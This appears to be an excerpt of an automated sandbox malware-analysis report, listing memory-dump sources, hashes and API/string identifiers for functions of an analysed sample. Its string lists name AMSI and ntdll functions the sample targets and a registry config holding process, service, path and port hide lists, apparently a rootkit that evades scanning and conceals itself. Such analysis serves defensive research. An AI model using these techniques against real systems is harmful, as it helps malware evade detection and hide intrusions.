                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CloseOpen$Heap$AllocProcessSleep
                                            • String ID:
                                            • API String ID: 948135145-0
                                            • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction ID: da9c226a4c26d9eb97cb51e5844c6d5d2d2e3176618dd107d9989a4fec9744ac
                                            • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction Fuzzy Hash: 6B315175ACCE0951FB52DB23DD4D36923A4AB44BD2F0474219E0A97FB6DE34CA708A0C

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: d7a8eae69e3a118943c7a68f742a17d896bd607eadc51ecfcc687599f46614eb
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: 76B1E971AD8E9882EB56CF26DC487996BA4F784BC6F04601ADE0953FA4DF34CE60C744

                                            Control-flow Graph

                                            Control-flow graph (rendered as an image on the original page; executed vs. not-executed block colouring is not preserved in text): function 253fc432ff0-253fc4333a7, a second mapping of the same routine (identical Opcode ID) at module base 253fc430000. Basic blocks that call APIs: 253fc43308d-253fc43309d GetModuleHandleA; 253fc43309f-253fc4330af GetProcAddress; 253fc4330d8-253fc4330f7 StrCmpNIW; 253fc43320f-253fc43321c lstrlenW; 253fc4332b9-253fc4332c6 lstrlenW. Internal subroutine calls: 253fc431a30, 253fc431cc4, 253fc431cfc, 253fc433f88, 253fc443a40. The first six blocks (253fc432ff0 through 253fc433111) each have an early-exit edge to the epilogue block 253fc433384-253fc4333a7.
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: ccbbc6e9edea5e8486e6f80a02a8aae30d180b6a152031c1907c9f2bd62a7343
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: 10B1B371A58E9882EB56CF25C80879963A4F7C0BC6F906026EE0D57F94DF34CE61D748
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: 18098eab73ae22247e8997de78074f9d1c62639e070d82cd20275224b332567a
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: 77318172A48F8486EB62CF61EC443DD7360F784789F44502ADA8D47BA4DF78C658C714
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: f2d667fddb63464018b1186fc3f2dac64a45d194d1ad2792964a2c7c3122a1aa
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: 83315A72A08F8486EB61CF60E8447ED7360F784799F54502ADA4E47F98EF38C658C714
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: 3d92adde8fb258e617e55ec2da3fc78e5f0a897a2cddf62eb9678babbca71e80
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: 36418E32A98F8486E761CF25EC443DE73A4F788795F501115EA9D47BA8DF38C265CB04
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: 6e9a1ca4481f4c7a2e32b4ab4d38883408135ec68585e79261f68911a25fddf3
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: DB418132618F8486EB61CB24E84479E73A4F784795F601226EA9D46F98DF38C265CB04
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: f680a45d3fb9276a9b9de983c3979be6679c8c974a285e8f13c67f95f6ce25f0
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: 91A13B32FCCE8445FB26DB759C483AD6BA0E741BD5F046115DE9817EB9CA38C265C708
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: 383217fff9344e8a22cddf8481b819d225cfad024f4986472a2441910a6c3a26
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: EFA15A32F6CE8445FB26DBB19C483AD6BA1E7C1BD5F946031DE4417E98CA34C261E708
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: f689e4bdf539991d75b311556a79c3185f7ed38771ab50e22269851d20090f3e
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: B2113036B54F088AEB01CF61FC593A833B4F719799F441E21DA6D46BA4DF78C2648344
                                            APIs
                                              • Part of subcall function 00000253FC40D220: HeapAlloc.KERNEL32(?,?,00000000,00000253FC40C987), ref: 00000253FC40D275
                                              • Part of subcall function 00000253FC410EB8: _invalid_parameter_noinfo.LIBCMT ref: 00000253FC410EEB
                                            • FindFirstFileExW.KERNEL32 ref: 00000253FC40DB99
                                              • Part of subcall function 00000253FC40D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000253FC40674A), ref: 00000253FC40D2B6
                                              • Part of subcall function 00000253FC40D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000253FC40674A), ref: 00000253FC40D2C0
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2436724071-0
                                            • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                            • Instruction ID: 6c27e006430e11ddb22ae68fdfaf7a44bffd02c0191f88c36c82915789031eb1
                                            • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                            • Instruction Fuzzy Hash: 24812A32BC8F8445EB2ADF22AC4935EB791E744BD1F045115AE9907FA5DE3CC265C708
                                            APIs
                                              • Part of subcall function 00000253FC43D220: HeapAlloc.KERNEL32(?,?,00000000,00000253FC43C987), ref: 00000253FC43D275
                                              • Part of subcall function 00000253FC440EB8: _invalid_parameter_noinfo.LIBCMT ref: 00000253FC440EEB
                                            • FindFirstFileExW.KERNEL32 ref: 00000253FC43DB99
                                              • Part of subcall function 00000253FC43D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000253FC43674A), ref: 00000253FC43D2B6
                                              • Part of subcall function 00000253FC43D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000253FC43674A), ref: 00000253FC43D2C0
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2436724071-0
                                            • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                            • Instruction ID: ef8e49b32c6e8a090c3556ec2cd50822b31f2ffff0517cfc8940bff592d10b8f
                                            • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                            • Instruction Fuzzy Hash: DF816932B68E8441EB2ADFA1AC4835EB791F7C4BD1F845135AE9907F95CE38C261D308
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: HeapProcess
                                            • String ID:
                                            • API String ID: 54951025-0
                                            • Opcode ID: c14d8c3a46983987e9399fd1bc9cf0533130a6bceae918962a4bd8475db83ae9
                                            • Instruction ID: 00b6ff3f0bce4187b4fa2b6ae58bb7877a748ec946be4bb897b5cd881254434c
                                            • Opcode Fuzzy Hash: c14d8c3a46983987e9399fd1bc9cf0533130a6bceae918962a4bd8475db83ae9
                                            • Instruction Fuzzy Hash: C2B09230E87E48C6EB4BAB126C8A34422E4BB88B52FA46028C08C81720DA3C06B54B04
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: 433bb8a329592bc12bf6654cc3959ffaf980a2582f1fa474f52ef5feacbfe98f
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: AEB1C431A58E9D82EB68CFA5D828799A3A5F744BC6F006017EE0953F95DB3ECE40C744
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
                                            • Instruction ID: 69eb25c0bc27b2f2571852be8503ddd12845f796b09dfe4b22637d8a112b4771
                                            • Opcode Fuzzy Hash: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
                                            • Instruction Fuzzy Hash: E6A12932F58E8D45FB20DBB5AC683AD7BA1E3817D6F146016DE4527E95CA3CC242C708
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID: _invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 3215553584-0
                                            • Opcode ID: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
                                            • Instruction ID: 04ff29d726ed1bdd62d6b2a8ab691f2d7b5a31266cb15d0a8ceb13014e46f0e0
                                            • Opcode Fuzzy Hash: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
                                            • Instruction Fuzzy Hash: 10810832B68E8C45EB20DFA2BC6839EA791E385BD1F145116AE9947F95DE3CC2438704
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                            • Instruction ID: edfe39b0f28cd47b00fb367706ec48ce029e4237a986eda955636b07b7d1fdab
                                            • Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                            • Instruction Fuzzy Hash: 7F11CCB1A9C98B8AF75DDF69AC593593791E3043C5F40541FC44986E94C73EC2909F08

                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3414887735
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: c2c8c8362194f2ed02e52c3436e422369e64b730ac7919a933676a2416c4bbe5
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: 3B713C36B94E1889EB12DF62EC986982774FB84BCEF402111DD8E53F28DE34C664C748

                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3414887735
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: ee58faad4dfa1f58f98291d5e1af21f7bb67b176d79939ee6dd668a3e5e1729d
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: F0712A36B54E4885EB21DF21EC58A982374FB84BCEF902122DD4E57F28DE38C664D748

                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: 7f5964844ecfe9ee04adda162aea3f01c0d4c4e2268bca0172e23327c6e662f6
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 97518270D88E4EA5EA13DB68EC4DBD43320A7807D7F946923980912D66DE38837AD74C

                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: 75e2f7399ec0e385166b5f745de32dbeb41a36f22d86e7704eb634ab718eb5a5
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: 87516332A94F8896E716CF62E84839A77A1F788FD5F445124DE8A07B68DF3CC155CB04

                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
